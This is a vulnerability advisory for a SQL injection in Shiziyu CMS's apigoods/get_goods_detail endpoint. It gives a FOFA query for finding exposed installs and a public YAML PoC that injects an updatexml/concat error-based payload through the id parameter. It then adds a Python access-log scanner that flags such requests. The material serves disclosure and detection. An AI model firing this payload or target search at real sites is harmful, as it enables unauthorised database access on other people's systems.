shiziyu-cms-apigood-controller-sql-injection: Shiziyu CMS (狮子鱼CMS) ApigoodController.class.php SQL injection vulnerability

Date: 2025-09-01 | Affected software: Shiziyu CMS (狮子鱼CMS) Apigood Controller | POC: public

Vulnerability description

Parameter filtering in Shiziyu CMS (狮子鱼CMS) ApiController.class.php is not strict, which leads to a SQL injection vulnerability.

fofa-query: "/seller.php?s=/Public/login"

PoC code [public]

id: shiziyu-cms-apigood-controller-sql-injection

info:
  name: 狮子鱼CMS ApigoodController.class.php SQL注入漏洞
  author: daffainfo
  severity: critical
  description: |
    狮子鱼CMS ApiController.class.php 参数过滤存在不严谨,导致SQL注入漏洞
    fofa-query: "/seller.php?s=/Public/login"
  reference:
    - https://github.com/Threekiii/Awesome-POC/blob/master/CMS%E6%BC%8F%E6%B4%9E/%E7%8B%AE%E5%AD%90%E9%B1%BCCMS%20ApigoodController.class.php%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
    
set:
  rand: randomInt(200000000, 210000000)
rules:
  r0:
    request:
      method: GET
      path: /index.php?s=apigoods/get_goods_detail&id=1%20and%20updatexml(1,concat(0x7e,md5({{rand}}),0x7e),1)
    expression:  response.status == 404 && response.body.bcontains(bytes(substr(md5(string(rand)), 0, 31)))
expression: r0()
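
A defender-side check for the request shape in the PoC above, as an added example that is not part of the original page or the referenced project: it scans web access-log lines for requests to `apigoods/get_goods_detail` whose `id` is not a plain integer. The combined log format, the integer-only `id` rule and the sample lines are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

ROUTE = "apigoods/get_goods_detail"          # route from the PoC path above
NUMERIC_ID = re.compile(r"^\d+$")            # assumption: valid ids are integers
SQL_FUNCS = re.compile(r"\b(updatexml|extractvalue|concat)\s*\(", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')


def classify(log_line):
    """Return None for unrelated lines, else (verdict, http_status)."""
    m = REQUEST.search(log_line)
    if not m:
        return None
    # parse_qs percent-decodes values, so %20 and %27 are seen as ' ' and "'".
    query = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
    if query.get("s", [""])[0].strip("/").lower() != ROUTE:
        return None
    ids = query.get("id", [])
    if all(NUMERIC_ID.match(v) for v in ids):
        verdict = "ok"
    elif any(SQL_FUNCS.search(v) for v in ids):
        verdict = "sqli-function"
    else:
        verdict = "non-numeric-id"
    return verdict, int(m.group(2))


def scan(lines):
    """Return (line_number, verdict, status) for every suspicious request."""
    hits = []
    for n, line in enumerate(lines, 1):
        result = classify(line)
        if result and result[0] != "ok":
            hits.append((n, *result))
    return hits


# Constructed sample access-log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Sep/2025:10:00:01 +0000] "GET /index.php?s=apigoods/get_goods_detail&id=42 HTTP/1.1" 200 1834',
    '198.51.100.7 - - [01/Sep/2025:10:00:05 +0000] "GET /index.php?s=apigoods/get_goods_detail&id=1%20and%20updatexml(1,concat(0x7e,md5(200000001),0x7e),1) HTTP/1.1" 404 512',
    '192.0.2.11 - - [01/Sep/2025:10:00:09 +0000] "GET /index.php?s=apigoods/get_goods_detail&id=7%27 HTTP/1.1" 404 498',
    '192.0.2.12 - - [01/Sep/2025:10:00:12 +0000] "GET /seller.php?s=/Public/login HTTP/1.1" 200 2201',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The numeric check comes first because matching on function names alone can be bypassed. The same integer-only rule, enforced in the application before the value reaches the query, removes the injection point.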